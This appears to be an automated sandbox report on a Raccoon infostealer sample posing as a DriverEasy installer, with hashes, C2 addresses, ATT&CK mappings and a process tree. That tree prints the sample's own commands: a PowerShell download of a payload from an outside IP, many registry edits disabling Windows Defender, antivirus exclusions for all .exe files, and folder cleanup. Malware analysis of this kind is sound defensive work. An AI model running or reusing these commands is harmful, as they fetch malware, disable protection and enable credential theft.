raccoon | e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12

Analysis

max time kernel
148s
max time network
152s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
27-09-2022 04:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exe
Size

6.0MB
MD5

e9acfc93e52dd181932e7604184beecb
SHA1

a5172b25d36f9954ae0c198f569432c4954a00b2
SHA256

e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12
SHA512

803e01f218c1e427a3585b30c260824ac8a7b8e687976619fbf61e2645ff1905cefd1004d3f54b9580ee8e90f4e8a23a28e616b933e433fcb120c5b97e3ac2d6
SSDEEP

196608:SkV6yZjVzDxw7ZX1J8ZG+HIf5XI+l5Qs0:RV5xzG7d/1XI+XQv

Score

10^/10

raccoon 9b19cf60d9bdf65b8a2495aa965456c3 evasion spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://80.92.205.35/hfile.bin

Extracted

Family

raccoon

Botnet

9b19cf60d9bdf65b8a2495aa965456c3

http://94.131.107.206

rc4.plain

Signatures

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

evasion trojan

Modify Existing Service

T1031

Modify Registry

T1112

Disabling Security Tools

T1089

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 2004 powershell.exe
Downloads MZ/PE file

flow	pid	process
3	2004	powershell.exe

Executes dropped EXE 17 IoCs

Processes:

e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmpDriverEasy.5.7.3.exeDriverEasy.5.7.3.tmp7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exelrPBx4qjVQLL.exe

pid	process
1964	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
944	DriverEasy.5.7.3.exe
1768	DriverEasy.5.7.3.tmp
832	7za.exe
1524	7za.exe
540	7za.exe
1456	7za.exe
1336	7za.exe
1636	7za.exe
1364	7za.exe
1984	7za.exe
1436	7za.exe
572	7za.exe
824	7za.exe
1824	7za.exe
1836	7za.exe
968	lrPBx4qjVQLL.exe

Loads dropped DLL 27 IoCs

Processes:

e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exee2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmpDriverEasy.5.7.3.exeDriverEasy.5.7.3.tmpcmd.execmd.exeInstallUtil.exe

pid	process
1996	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exe
1964	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
1964	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
944	DriverEasy.5.7.3.exe
1768	DriverEasy.5.7.3.tmp
1768	DriverEasy.5.7.3.tmp
1768	DriverEasy.5.7.3.tmp
1768	DriverEasy.5.7.3.tmp
1768	DriverEasy.5.7.3.tmp
1656	cmd.exe
1656	cmd.exe
1344	cmd.exe
1344	cmd.exe
1344	cmd.exe
1344	cmd.exe
1344	cmd.exe
1344	cmd.exe
1344	cmd.exe
1344	cmd.exe
1344	cmd.exe
1344	cmd.exe
1344	cmd.exe
1344	cmd.exe
1344	cmd.exe
1644	InstallUtil.exe
1644	InstallUtil.exe
1644	InstallUtil.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Suspicious use of SetThreadContext 1 IoCs

Processes:

lrPBx4qjVQLL.exe

description pid process target process

PID 968 set thread context of 1644 968 lrPBx4qjVQLL.exe InstallUtil.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

1504 PING.EXE
604 PING.EXE
1704 PING.EXE

description	pid	process	target process
PID 968 set thread context of 1644	968	lrPBx4qjVQLL.exe	InstallUtil.exe

pid	process
1504	PING.EXE
604	PING.EXE
1704	PING.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmpDriverEasy.5.7.3.tmppowershell.exepowershell.exepowershell.exelrPBx4qjVQLL.exe

pid	process
1964	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
1964	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
1768	DriverEasy.5.7.3.tmp
2004	powershell.exe
1784	powershell.exe
1764	powershell.exe
968	lrPBx4qjVQLL.exe
968	lrPBx4qjVQLL.exe
968	lrPBx4qjVQLL.exe
968	lrPBx4qjVQLL.exe
968	lrPBx4qjVQLL.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2004 powershell.exe
Token: SeDebugPrivilege 1784 powershell.exe
Token: SeDebugPrivilege 1764 powershell.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp

pid process

1964 e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp

description	pid	process
Token: SeDebugPrivilege	2004	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	1764	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exee2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmpDriverEasy.5.7.3.execmd.exeWScript.execmd.exe

description	pid	process	target process
PID 1996 wrote to memory of 1964	1996	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exe	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
PID 1996 wrote to memory of 1964	1996	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exe	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
PID 1996 wrote to memory of 1964	1996	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exe	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
PID 1996 wrote to memory of 1964	1996	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exe	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
PID 1996 wrote to memory of 1964	1996	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exe	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
PID 1996 wrote to memory of 1964	1996	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exe	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
PID 1996 wrote to memory of 1964	1996	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exe	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
PID 1964 wrote to memory of 944	1964	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp	DriverEasy.5.7.3.exe
PID 1964 wrote to memory of 944	1964	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp	DriverEasy.5.7.3.exe
PID 1964 wrote to memory of 944	1964	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp	DriverEasy.5.7.3.exe
PID 1964 wrote to memory of 944	1964	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp	DriverEasy.5.7.3.exe
PID 1964 wrote to memory of 944	1964	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp	DriverEasy.5.7.3.exe
PID 1964 wrote to memory of 944	1964	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp	DriverEasy.5.7.3.exe
PID 1964 wrote to memory of 944	1964	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp	DriverEasy.5.7.3.exe
PID 1964 wrote to memory of 1656	1964	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp	cmd.exe
PID 1964 wrote to memory of 1656	1964	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp	cmd.exe
PID 1964 wrote to memory of 1656	1964	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp	cmd.exe
PID 1964 wrote to memory of 1656	1964	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp	cmd.exe
PID 944 wrote to memory of 1768	944	DriverEasy.5.7.3.exe	DriverEasy.5.7.3.tmp
PID 944 wrote to memory of 1768	944	DriverEasy.5.7.3.exe	DriverEasy.5.7.3.tmp
PID 944 wrote to memory of 1768	944	DriverEasy.5.7.3.exe	DriverEasy.5.7.3.tmp
PID 944 wrote to memory of 1768	944	DriverEasy.5.7.3.exe	DriverEasy.5.7.3.tmp
PID 944 wrote to memory of 1768	944	DriverEasy.5.7.3.exe	DriverEasy.5.7.3.tmp
PID 944 wrote to memory of 1768	944	DriverEasy.5.7.3.exe	DriverEasy.5.7.3.tmp
PID 944 wrote to memory of 1768	944	DriverEasy.5.7.3.exe	DriverEasy.5.7.3.tmp
PID 1656 wrote to memory of 2004	1656	cmd.exe	powershell.exe
PID 1656 wrote to memory of 2004	1656	cmd.exe	powershell.exe
PID 1656 wrote to memory of 2004	1656	cmd.exe	powershell.exe
PID 1656 wrote to memory of 2004	1656	cmd.exe	powershell.exe
PID 1656 wrote to memory of 832	1656	cmd.exe	7za.exe
PID 1656 wrote to memory of 832	1656	cmd.exe	7za.exe
PID 1656 wrote to memory of 832	1656	cmd.exe	7za.exe
PID 1656 wrote to memory of 832	1656	cmd.exe	7za.exe
PID 1656 wrote to memory of 1704	1656	cmd.exe	PING.EXE
PID 1656 wrote to memory of 1704	1656	cmd.exe	PING.EXE
PID 1656 wrote to memory of 1704	1656	cmd.exe	PING.EXE
PID 1656 wrote to memory of 1704	1656	cmd.exe	PING.EXE
PID 1656 wrote to memory of 956	1656	cmd.exe	WScript.exe
PID 1656 wrote to memory of 956	1656	cmd.exe	WScript.exe
PID 1656 wrote to memory of 956	1656	cmd.exe	WScript.exe
PID 1656 wrote to memory of 956	1656	cmd.exe	WScript.exe
PID 956 wrote to memory of 856	956	WScript.exe	cmd.exe
PID 956 wrote to memory of 856	956	WScript.exe	cmd.exe
PID 956 wrote to memory of 856	956	WScript.exe	cmd.exe
PID 956 wrote to memory of 856	956	WScript.exe	cmd.exe
PID 856 wrote to memory of 1748	856	cmd.exe	reg.exe
PID 856 wrote to memory of 1748	856	cmd.exe	reg.exe
PID 856 wrote to memory of 1748	856	cmd.exe	reg.exe
PID 856 wrote to memory of 1748	856	cmd.exe	reg.exe
PID 856 wrote to memory of 1252	856	cmd.exe	reg.exe
PID 856 wrote to memory of 1252	856	cmd.exe	reg.exe
PID 856 wrote to memory of 1252	856	cmd.exe	reg.exe
PID 856 wrote to memory of 1252	856	cmd.exe	reg.exe
PID 856 wrote to memory of 860	856	cmd.exe	reg.exe
PID 856 wrote to memory of 860	856	cmd.exe	reg.exe
PID 856 wrote to memory of 860	856	cmd.exe	reg.exe
PID 856 wrote to memory of 860	856	cmd.exe	reg.exe
PID 856 wrote to memory of 1000	856	cmd.exe	reg.exe
PID 856 wrote to memory of 1000	856	cmd.exe	reg.exe
PID 856 wrote to memory of 1000	856	cmd.exe	reg.exe
PID 856 wrote to memory of 1000	856	cmd.exe	reg.exe
PID 856 wrote to memory of 976	856	cmd.exe	reg.exe
PID 856 wrote to memory of 976	856	cmd.exe	reg.exe
PID 856 wrote to memory of 976	856	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exe
"C:\Users\Admin\AppData\Local\Temp\e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1996

C:\Users\Admin\AppData\Local\Temp\is-SDBFS.tmp\e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SDBFS.tmp\e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp" /SL5="$90124,5385413,969216,C:\Users\Admin\AppData\Local\Temp\e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1964

C:\Users\Admin\AppData\Local\Temp\is-D4OCA.tmp\DriverEasy.5.7.3.exe
"C:\Users\Admin\AppData\Local\Temp\is-D4OCA.tmp\DriverEasy.5.7.3.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:944

C:\Users\Admin\AppData\Local\Temp\is-QAFB0.tmp\DriverEasy.5.7.3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QAFB0.tmp\DriverEasy.5.7.3.tmp" /SL5="$101B6,3761185,330752,C:\Users\Admin\AppData\Local\Temp\is-D4OCA.tmp\DriverEasy.5.7.3.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1768

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\SurfaceReduction\main.bat" "
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy bypass -noprofile -command "(New-Object System.Net.WebClient).DownloadFile('http://80.92.205.35/hfile.bin', 'hfile.bin')";
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe x -y -p10619mlgrAGP7211mlgrAGP24753 "*.zip"
4⤵
- Executes dropped EXE
PID:832

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 10
4⤵
- Runs ping.exe
PID:1704

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\SurfaceReduction\ControlSet003.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:956

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\SurfaceReduction\ControlSet001_obf.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:856

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
6⤵
PID:1748

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
6⤵
PID:1252

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
6⤵
PID:860

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
6⤵
PID:1000

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
6⤵
PID:976

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
6⤵
PID:992

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
6⤵
PID:1992

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
6⤵
PID:904

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
6⤵
PID:1624

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
6⤵
PID:1716

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
6⤵
PID:1744

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
6⤵
PID:1600

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
6⤵
PID:1488

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
6⤵
PID:1444

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
6⤵
PID:1504

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
6⤵
PID:1732

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
6⤵
PID:1772

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 1 /f
6⤵
PID:376

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
6⤵
PID:1516

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender notification settings
PID:1020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SurfaceReduction"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionExtension ".exe"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1764

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\SurfaceReduction\compil32_obf.bat" "
5⤵
- Loads dropped DLL
PID:1344

C:\Windows\SysWOW64\mode.com
mode 65,10
6⤵
PID:692

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e file.zip -p9178UTuitA24715UTuitA26909 -oextracted
6⤵
- Executes dropped EXE
PID:1524

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_11.zip -oextracted
6⤵
- Executes dropped EXE
PID:540

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_10.zip -oextracted
6⤵
- Executes dropped EXE
PID:1456

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_9.zip -oextracted
6⤵
- Executes dropped EXE
PID:1336

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_8.zip -oextracted
6⤵
- Executes dropped EXE
PID:1636

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_7.zip -oextracted
6⤵
- Executes dropped EXE
PID:1364

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_6.zip -oextracted
6⤵
- Executes dropped EXE
PID:1984

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_5.zip -oextracted
6⤵
- Executes dropped EXE
PID:1436

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_4.zip -oextracted
6⤵
- Executes dropped EXE
PID:572

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_3.zip -oextracted
6⤵
- Executes dropped EXE
PID:824

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_2.zip -oextracted
6⤵
- Executes dropped EXE
PID:1824

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_1.zip -oextracted
6⤵
- Executes dropped EXE
PID:1836

C:\ProgramData\SurfaceReduction\lrPBx4qjVQLL.exe
"lrPBx4qjVQLL.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:968

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
7⤵
PID:1700

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
7⤵
- Loads dropped DLL
PID:1644

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\SurfaceReduction\ControlSet002.bat" "
5⤵
PID:1624

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 5
6⤵
- Runs ping.exe
PID:1504

C:\Windows\SysWOW64\cmd.exe
cmd /c rd /q /s "C:\ProgramData\SurfaceReduction\"
6⤵
PID:1972

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
4⤵
- Runs ping.exe
PID:604

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
